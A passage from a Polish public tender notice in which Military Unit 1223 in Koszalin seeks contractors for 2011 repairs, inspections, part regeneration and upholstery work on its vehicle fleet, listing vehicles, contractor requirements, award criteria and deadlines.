2. naprawa poszyć bocznych drzwi;
3. naprawa poszycia maski silnika;
4. naprawa leżanek w pojazdach specjalnych;
5. naprawa hamaków pojazdy specjalne;
6. naprawa podsufitek w kabinie kierowcy;

Wyżej wymieniony zakres naprawy elementów tapicerki samochodowej obejmuje wszystkie pojazdy wymienione poniżej:

TYP,MARKA POJAZDU	r.prod.	szt	JW
Mercedes 290GD	1995	1	1223
Tarpan 4022 TC 		1995	1	1223
Honker 2000 		2004	3	1223
Honker 2424	2003	2	1223
Honker 2424	2004	2	1223
Honker 2424	2005	2	1223
Star 200	1986	1	1223
Star 200	1988	1	1223
Star 944 (silnik MAN)	2004	2	1223
Star 944 (silnik MAN)	2005	2	1223
Star 944 (silnik MAN)	2006	1	1223
Autobus pasażerski Autosan H-10-10	2000	1	1223
Star 29 Chlebowóz	1981	1	1223
IVECO sanitarka M40E 13WM	2008	2	1223
STAR 266 	1984	24	1223
ZIŁ 131	1983-1985	10	1223
ZIŁ157	1983-1985	6	1223
KRAZ 255	1983-1985	4	1223
MAN 40.464 DFAT	1999	1	1223
Warunki odbioru usługi:
1. Potwierdzeniem wykonanej usługi ( jej zakres i prawidłowość wykonania naprawy ) będzie protokół  odbioru podpisany przez obie strony.
2. W fakturze zostaną wymienione części, materiały i roboczogodziny, które wykonawca zużył do naprawy elementów tapicerki samochodowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Złożą oświadczenie, że wykonawca nie zalega z opłacaniem podatków lub, że   
 uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (z wykorzystaniem  wzoru zawartego w załączniku nr 4); 
2)	Złożą oświadczenie, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (z wykorzystaniem  wzoru zawartego w załączniku nr 5);
3)	w przypadku korzystania z usług  podwykonawcy zamawiający żąda od wykonawcy wskazania w ofercie zakresu zamówienia, który zostanie powierzony podwykonawcom ( należy wypełnić oświadczenie zgodnie z załącznikiem nr 6 do SIWZ)Ocena spełnienia warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia w oparciu o załączone dokumenty i oświadczenia przedstawione zgodnie z wymaganiami zawartymi w SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie iż w.w. warunki zostały spełnione</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Załączą pełnomocnictwo - w przypadku podmiotów występujących wspólnie (spółka cywilna, konsorcjum). 
2)   Oświadczenie dotyczące korzystania z usług podwykonawcy zał. Nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Marża - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA 1223
UL. 4-GO MARCA 5
75-900 KOSZALIN.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2011 godzina 08:45, miejsce: JEDNOSTKA WOJSKOWA 1223
UL. 4-GO MARCA 5
75-900 KOSZALIN
KANCELARIA OGÓLNA BUDYNEK SZTABU.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Naprawa pojazdów osobowych i osobowo-terenowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: wykonanie w 2011 roku usługi przeglądów technicznych            i napraw bieżących pojazdów w ilościach i w czasie wynikających z bieżących potrzeb oraz  według wskazań pokładowych systemów kontroli sprawności a także przebiegu i czasu eksploatacji  pojazdów samochodowych w Jednostce Wojskowej 1223 Koszalin.
Zamawiający dostarczy pojazd pod wskazany adres wykonawcy na terenie m. Koszalina         a w przypadku realizacji usługi poza granicami administracyjnymi miasta, nie dalej niż do miejsca oddalonego o 20 km od granic administracyjny. W przypadku większej odległości niż 20 km od granic administracyjnych miasta Koszalin  transport realizuje wykonawca usługi na własny koszt. 
Wykonanie usługi nastąpi po uzgodnieniu zakresu naprawy oraz zatwierdzeniu kosztorysu wykonawcy przez zamawiającego.

Wymagania:

1)	JW 1223 będzie dokonywała zapłaty za faktycznie wykonane naprawy (nie za dyspozycyjność zakładu). Naprawy są naprawami awaryjnymi, nie planowanymi i wynikającymi z różnych aspektów użytkowania wojskowych pojazdów mechanicznych, nie jest możliwe określenie ich częstości i rodzaju - grupy uszkodzeń (awarii).
2)	Dopuszcza się wykonywanie napraw przez podwykonawców pod warunkiem, że wykonawca weźmie pełną odpowiedzialność za część prac wykonanych przez podwykonawcę - zamawiający nie dopuszcza faktur częściowych  od podwykonawców.
3)	Nie dopuszcza się zmian konstrukcyjnych pojazdów oraz ich podzespołów i układów.
4)	Części użyte do napraw będą  nowe. Dopuszcza się regeneracje podzespołów. Na  żądanie zamawiającego usługę wykonawca przedstawi źródło pochodzenia części.
5)	Na wykonaną usługę zostanie udzielona minimum 3-miesieczna gwarancja a na nowe podzespoły gwarancja udzielona przez producenta .
6)	Cena części zużytych do naprawy nie może przekraczać rzeczywistej udokumentowanej ceny nabycia wraz z należnym podatkiem i marżą.
7)	Cena zregenerowanego podzespołu nie może przekraczać 60% wartości nowego.  
8)	Awarie pojazdów zgłaszane będą doraźnie niezwłocznie po ich wystąpieniu. 
9)	Cena za usługę będzie obejmowała diagnozowanie oraz usunięcie usterki.
10)	Cena usługi jest ceną brutto zawierającą koszt roboczogodzin oraz użytych części zamiennych i materiałów.
11)	Wykonawca jest gwarantem wszelkich wykonanych przez siebie ( i przez podwykonawców)  usług i napraw, 
12)	Termin wykonania usługi naprawy pojazdu nie może być dłuższy niż 5 dni roboczych od daty akceptacji kosztorysu wykonania naprawy przez zamawiającego. Wykonawca zagwarantuje wykonanie napraw jednocześnie 1 (jednego) pojazdu z każdej z grup tj. osobowych, osobowo-terenowych, ciężarowych. Termin wykonania usługi może ulec przedłużeniu za zgodą zamawiającego.
13)	Materiały eksploatacyjne użyte w czasie naprawy musza być zgodne z zaleceniem producenta pojazdu.
14)	Materiały użyte w czasie napraw a stanowiące zagrożenie dla środowiska naturalnego zostaną zutylizowane przez wykonawcę. 
15)	Każdorazowa naprawa poprzedzona będzie wstępnym kosztorysem jej wykonania            (dostarczona przez wykonawcę do zamawiającego). Rozpoczęcie usługi może odbyć się tylko i wyłącznie po akceptacji kosztorysu przez zamawiającego.
16)	Wykonawca musi dysponować odpowiednim zapleczem obsługowo remontowym mogącym zapewnić spełnienie warunków zamówienia tj. halą naprawczą, właściwą ilością stanowisk naprawczych, wyposażeniem umożliwiającym usunięcie usterek (awarii) przedstawionych poniżej w opisie przedmiotu zamówienia oraz stosownym personelem.
17)	Faktura za wykonaną usługę w treści musi zawierać koszt ogólny  wykonanych usług i napraw, w załączniku do faktury wykonawca opisuje operacje wykonane podczas wykonywania usługi.
18)	W przypadku awaryjnego uszkodzenia pojazdu ( reklamacja usługi )wykonawca na swój koszt odbierze pojazd z miejsca wskazanego przez zamawiającego z przestrzeganiem procedur obowiązujących w prawie o ruchu drogowym i  wykona naprawę  w terminie nie dłuższym niż 48 godziny licząc od momentu zgłoszenia faktu zaistnienia awarii.

	Miejsce realizacji zamówienia: 

W zakładzie wykonującym usługę. 
Zamawiający dostarczy pojazd pod wskazany adres wykonawcy na terenie m. Koszalina        a w przypadku realizacji usługi poza granicami administracyjnymi miasta, nie dalej niż do miejsca oddalonego o 20 km od granic administracyjny. W przypadku większej odległości niż 20 km od granic administracyjnych miasta Koszalin  transport realizuje wykonawca usługi na własny koszt. 
Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. (art.36 ust.5 Pzp). Zamawiający żąda wskazania w wybranej ofercie przez Wykonawcę w jakim zakresie powierzy wykonanie usługi podwykonawcom.

Termin wykonania zamówienia: od dnia zawarcia umowy do 30.11.2011r. 

Przeglądy techniczne i  naprawy bieżące obejmują następujące pojazdy :

TYP, MARKA POJAZDU	r. prod.	szt	JW
Mercedes 290GD	1995	2	1223
Tarpan 4022 TC  	1995	1	1223
Honker 2000  	2004	3	1223
Honker 2424 	2003	2	1223
Honker 2424 	2004	4	1223
Honker 2424 	2005	2	1223

Planowana ilość pojazdów do naprawy  14 szt. w okresie trwania umowy 

PODANE ILOŚCI MOGĄ ULEC ZMIANIE W ZALEŻNOŚCI OD POTRZEB ZAMAWIAJĄCEGO

Zakres naprawy pojazdów  w zadaniu będzie obejmował następujące czynności - układy:
1.	 diagnostyka komputerowa silnika i jego układów;
2.	 diagnostyka poduszek i kurtyn powietrznych
3.	 obsługiwania okresowe wynikające ze wskazań komputera pokładowego
      przewidzianego dla danej marki;
4.	 naprawa układów pojazdu:
a) kierowniczego,
b) przeniesienia mocy,
c) hamulcowego,
d) zasilania paliwem i powietrzem,
e) naprawa instalacji elektrycznej,
f) naprawa zawieszenia pojazdu,
g naprawa osprzętu silnika,
h) naprawa wciągarki.
5.	 naprawa klimatyzacji;
6.	 naprawa zawieszenia;
7.	 naprawa układu hamulcowego;
8.	drobne naprawy blacharskie;
9.	renowacja powłoki lakierniczej.

Zakres naprawy podzespołów do pojazdów samochodowych będzie obejmował
1.	naprawę skrzyń biegów; 
2.	naprawę mostów napędowych; 
3.	regenerację wałów napędowych i resorów ;
4.	regenerację przekładni kierowniczych i pomp wtryskowych. 

W zakresie przedmiotowym napraw nie wchodzi wymiana akumulatorów, foteli, dywaników, pasów bezpieczeństwa.

Warunki odbioru usługi:
1.	Potwierdzeniem wykonanej usługi ( jej zakres i prawidłowość wykonania ) będzie protokół podpisany przez obie strony.
2.	W fakturze zostaną wymienione części, materiały i roboczogodziny, które wykonawca zużył do naprawy pojazdu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Marża - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Naprawa pojazdów ciężarowych i autobusu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II zamówienia: Naprawa pojazdów ciężarowych i autobusu

SZCZEGÓŁOWE OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA

Przedmiotem zamówienia jest: wykonanie w 2011 roku usługi przeglądów technicznych            i napraw bieżących pojazdów w ilościach i w czasie wynikających z bieżących potrzeb oraz  według wskazań pokładowych systemów kontroli sprawności a także przebiegu i czasu eksploatacji  pojazdów samochodowych w Jednostce Wojskowej 1223 Koszalin. 
Zamawiający dostarczy pojazd pod wskazany adres wykonawcy na terenie m. Koszalina        a w przypadku realizacji usługi poza granicami administracyjnymi miasta, nie dalej niż do miejsca oddalonego o 20 km od granic administracyjny. W przypadku większej odległości niż 20 km od granic administracyjnych miasta Koszalin  transport realizuje wykonawca usługi na własny koszt. 
Wykonanie usługi nastąpi po uzgodnienie zakresu naprawy oraz zatwierdzeniu kosztorysu wykonawcy przez zamawiającego.

Wymagania:

1)	JW 1223 będzie dokonywała zapłaty za faktycznie wykonane naprawy (nie za dyspozycyjność zakładu). Naprawy są naprawami awaryjnymi, nie planowanymi i wynikającymi z różnych aspektów użytkowania wojskowych pojazdów mechanicznych, nie jest możliwe określenie ich częstości i rodzaju - grupy uszkodzeń (awarii).
2)	Dopuszcza się wykonywanie napraw przez podwykonawców pod warunkiem, że wykonawca weźmie pełną odpowiedzialność za część prac wykonanych przez podwykonawcę - zamawiający nie dopuszcza faktur częściowych  od podwykonawców.
3)	Nie dopuszcza się zmian konstrukcyjnych pojazdów oraz ich podzespołów i układów.
4)	Części użyte do napraw będą  nowe. Dopuszcza się regeneracje podzespołów. Na  żądanie zamawiającego usługę wykonawca przedstawi źródło pochodzenia części.
5)	Na wykonaną usługę zostanie udzielona minimum 3-miesieczna gwarancja a na nowe podzespoły gwarancja udzielona przez producenta .
6)	Cena części zużytych do naprawy nie może przekraczać rzeczywistej udokumentowanej ceny nabycia wraz z należnym podatkiem i marżą.
7)	Cena zregenerowanego podzespołu nie może przekraczać 60% wartości nowego.  
8)	Awarie pojazdów zgłaszane będą doraźnie niezwłocznie po ich wystąpieniu. 
9)	Cena za usługę będzie obejmowała diagnozowanie oraz usunięcie usterki.
10)	Cena usługi jest ceną brutto zawierającą koszt roboczogodzin oraz użytych części zamiennych i materiałów.
11)	Wykonawca jest gwarantem wszelkich wykonanych przez siebie ( i przez podwykonawców)  usług i napraw, 
12)	Termin wykonania usługi naprawy pojazdu nie może być dłuższy niż 5 dni roboczych od daty akceptacji kosztorysu wykonania naprawy przez zamawiającego. Wykonawca zagwarantuje wykonanie napraw jednocześnie 1 (jednego) pojazdu z każdej z grup tj. osobowych, osobowo-terenowych, ciężarowych. Termin wykonania usługi może ulec przedłużeniu za zgodą zamawiającego.
13)	Materiały eksploatacyjne użyte w czasie naprawy musza być zgodne z zaleceniem producenta pojazdu.
14)	Materiały użyte w czasie napraw a stanowiące zagrożenie dla środowiska naturalnego zostaną zutylizowane przez wykonawcę. 
15)	Każdorazowa naprawa poprzedzona będzie wstępnym kosztorysem jej wykonania            (dostarczona przez wykonawcę do zamawiającego). Rozpoczęcie usługi może odbyć się tylko i wyłącznie po akceptacji kosztorysu przez zamawiającego.
16)	Wykonawca musi dysponować odpowiednim zapleczem obsługowo remontowym mogącym zapewnić spełnienie warunków zamówienia tj. halą naprawczą, właściwą ilością stanowisk naprawczych, wyposażeniem umożliwiającym usunięcie usterek (awarii) przedstawionych poniżej w opisie przedmiotu zamówienia oraz stosownym personelem.
17)	Faktura za wykonaną usługę w treści musi zawierać koszt ogólny  wykonanych usług i napraw, w załączniku do faktury wykonawca opisuje operacje wykonane podczas wykonywania usługi.
18)	W przypadku awaryjnego uszkodzenia pojazdu ( reklamacja usługi )wykonawca na swój koszt odbierze pojazd z miejsca wskazanego przez zamawiającego z przestrzeganiem procedur obowiązujących w prawie o ruchu drogowym i  wykona naprawę  w terminie nie dłuższym niż 48 godziny licząc od momentu zgłoszenia faktu zaistnienia awarii.

	Miejsce realizacji zamówienia: 

W zakładzie wykonującym usługę. 
Zamawiający dostarczy pojazd pod wskazany adres wykonawcy na terenie m. Koszalina a w przypadku realizacji usługi poza granicami administracyjnymi miasta, nie dalej niż do miejsca oddalonego o 20 km od granic administracyjnych. W przypadku większej odległości niż 20 km od granic administracyjnych miasta Koszalin  transport realizuje wykonawca usługi na własny koszt. 
Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. (art.36 ust.5 Pzp). Zamawiający żąda wskazania w wybranej ofercie przez Wykonawcę w jakim zakresie powierzy wykonanie usługi podwykonawcom.

Termin wykonania zamówienia: od dnia zawarcia umowy do 30.11.2011r. 

Przeglądy techniczne i  naprawy bieżące obejmują następujące pojazdy :

TYP, MARKA POJAZDU	r. prod.	szt	JW
Star 200 rok 1986	1986	1	1223
Star 200 rok 1988	1988	1	1223
Star 266	1980	8	1223
Star 944 (silnik MAN)	2005	4	1223
Ził 131	1980	4	1223
Autobus pasażerski Autosan H-10-10	2000	1	1223

Planowana ilość pojazdów do naprawy  19 szt. w okresie trwania umowy 

PODANE ILOŚCI MOGĄ ULEC ZMIANIE W ZALEŻNOŚCI OD POTRZEB ZAMAWIAJĄCEGO.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Marża - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi regeneracji poszczególnych podzespołów  w pojazdach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: wykonanie w 2011 roku usługi regeneracji poszczególnych podzespołów  w pojazdach:

TYP,MARKA POJAZDU	r.prod.	szt	JW
Mercedes 290GD	1995	1	1223
Tarpan 4022 TC 		1995	1	1223
Honker 2000 		2004	3	1223
Honker 2424	2003	2	1223
Honker 2424	2004	2	1223
Honker 2424	2005	2	1223
Star 200	1986	1	1223
Star 200	1988	1	1223
Star 944 (silnik MAN)	2004	2	1223
Star 944 (silnik MAN)	2005	2	1223
Star 944 (silnik MAN)	2006	1	1223
Autobus pasażerski Autosan H-10-10	2000	1	1223
Star 29 Chlebowóz	1981	1	1223
IVECO sanitarka M40E 13WM	2008	2	1223
STAR 266 	1984	24	1223
ZIŁ 131	1983-1985	10	1223
ZIŁ157	1983-1985	6	1223
KRAZ 255	1983-1985	4	1223
MAN 40.464 DFAT	1999	1	1223

w ilościach i w czasie wynikających z bieżących potrzeb w Jednostce Wojskowej 1223 Koszalin. 
Wykonanie usługi nastąpi po uzgodnieniu zakresu naprawy oraz zatwierdzeniu kosztorysu wykonawcy przez zamawiającego. 

Wymagania:

1.	Dopuszcza się wykonywanie regeneracji podzespołów przez podwykonawców pod
 warunkiem, że wykonawca weźmie pełną odpowiedzialność za część prac wykonanych przez podwykonawcę - zamawiający nie dopuszcza faktur częściowych  od podwykonawców.
2.	Nie dopuszcza się zmian konstrukcyjnych regenerowanych podzespołów.
3.	Części użyte do regeneracji będą nowe. Na żądanie zamawiającego usługę wykonawca przedstawi źródło pochodzenia części.
4.	Na wykonaną usługę zostanie udzielona minimum 6-miesieczna gwarancja od daty wykonania usługi 
5.	Cena części zużytych do naprawy nie może przekraczać rzeczywistej udokumentowanej ceny nabycia wraz z należnym podatkiem i marżą.
6.	Cena za zregenerowanie podzespołu nie może przekraczać 60% wartości nowego podzespołu. 
7.	Cena za usługę będzie obejmowała diagnozowanie oraz usunięcie usterki.
8.	Cena usługi jest ceną brutto zawierającą koszt roboczogodzin oraz użytych części zamiennych i materiałów.
9.	Wykonawca jest gwarantem wszelkich wykonanych przez siebie ( i przez podwykonawców)  usług, 
10.	Termin wykonania usługi nie może być dłuższy niż 5 dni roboczych od daty akceptacji kosztorysu wykonania naprawy przez zamawiającego. Termin wykonania usługi może ulec przedłużeniu za zgodą zamawiającego.
11.	Materiały eksploatacyjne użyte w czasie regeneracji musza być zgodne z zaleceniem producenta danego podzespołu.
12.	Materiały użyte w czasie regeneracji a stanowiące zagrożenie dla środowiska naturalnego zostaną zutylizowane przez wykonawcę. 
13.	Każdorazowa regeneracja podzespołów  poprzedzona będzie wstępnym kosztorysem jej wykonania (dostarczonego przez wykonawcę do zamawiającego). Rozpoczęcie usługi może odbyć się tylko i wyłącznie po akceptacji kosztorysu przez zamawiającego.
14.	Wykonawca musi dysponować odpowiednim zapleczem obsługowo remontowym mogącym zapewnić spełnienie warunków zamówienia tj. wyposażeniem umożliwiającym usunięci usterek (awarii) przedstawionych poniżej w opisie przedmiotu zamówienia  oraz stosownym personelem.
15.	Faktura za wykonaną usługę w treści musi zawierać koszt ogólny  wykonanych usług i napraw, w załączniku do faktury wykonawca opisuje operacje wykonane podczas wykonywania usługi.

	Miejsce realizacji zamówienia: 

 W zakładzie wykonującym usługę. Podzespoły przeznaczone do regeneracji wykonawca odbiera z siedziby zamawiającego i przekazuje od  siedziby zamawiającego na koszt własny, co uwzględnił w złożonej ofercie /zapis ten nie dotyczy wykonawcy, którego zakład naprawczy mieści się na terenie m. Koszalin lub w odległości  do 20 km. od granic miasta       - w tym przypadku zamawiający sam dostarczy podzespoły i urządzenia do wykonawcy /
Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. (art.36 ust.5 Pzp). Zamawiający żąda wskazania w wybranej ofercie przez Wykonawcę w jakim zakresie powierzy wykonanie usługi podwykonawcom.

Termin wykonania zamówienia: od dnia zawarcia umowy do 30.11.2011r. 

Regeneracja poszczególnych części pojazdów  obejmuje:

Zakres  regeneracji  w zadaniu będzie obejmował następujące czynności  :

1. regenerację skrzyń biegów;
2. regenerację skrzyń rozdzielczych;
3. regenerację mostów napędowych;
4. regenerację wałów napędowych;
5. regenerację resorów;
6. regenerację przekładni kierowniczych;
7. regenerację pomp wspomagania układu kierowniczego;
8. regenerację pomp wtryskowych;
9. regenerację sprężarek;
10. regenerację mechanizmów wspomagania hamulców;
11. regenerację głowic silnikowych
12.	regenerację rozruszników;
13.	regenerację alternatorów
14.	regenerację wtryskiwaczy
15.	regenerację podnośników samochodowych 
Wyżej wymieniony zakres regenerowanych podzespołów obejmuje wszystkie pojazdy wymienione w części III zamówienia.

Warunki odbioru usługi:

1. Potwierdzeniem wykonanej usługi ( jej zakres i prawidłowość wykonania naprawy ) będzie protokół  odbioru podpisany przez obie strony.
2. W fakturze zostaną wymienione części, materiały i roboczogodziny, które wykonawca zużył         
    do regeneracji podzespołów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Marża - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi w zakresie naprawy tapicerki samochodowej:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: wykonanie w 2011 w zakresie naprawy tapicerki samochodowej:



TYP,MARKA POJAZDU	r.prod.	szt	JW
Mercedes 290GD	1995	1	1223
Tarpan 4022 TC 		1995	1	1223
Honker 2000 		2004	3	1223
Honker 2424	2003	2	1223
Honker 2424	2004	2	1223
Honker 2424	2005	2	1223
Star 200	1986	1	1223
Star 200	1988	1	1223
Star 944 (silnik MAN)	2004	2	1223
Star 944 (silnik MAN)	2005	2	1223
Star 944 (silnik MAN)	2006	1	1223
Autobus pasażerski Autosan H-10-10	2000	1	1223
Star 29 Chlebowóz	1981	1	1223
IVECO sanitarka M40E 13WM	2008	2	1223
STAR 266 	1984	24	1223
ZIŁ 131	1983-1985	10	1223
ZIŁ157	1983-1985	6	1223
KRAZ 255	1983-1985	4	1223
MAN 40.464 DFAT	1999	1	1223

w ilościach i w czasie wynikających z bieżących potrzeb w Jednostce Wojskowej 1223 Koszalin. 
Wykonanie usługi nastąpi po uzgodnieniu zakresu naprawy oraz zatwierdzeniu kosztorysu wykonawcy przez zamawiającego. 

Wymagania:

1.	Dopuszcza się wykonywanie naprawy tapicerki przez podwykonawców pod
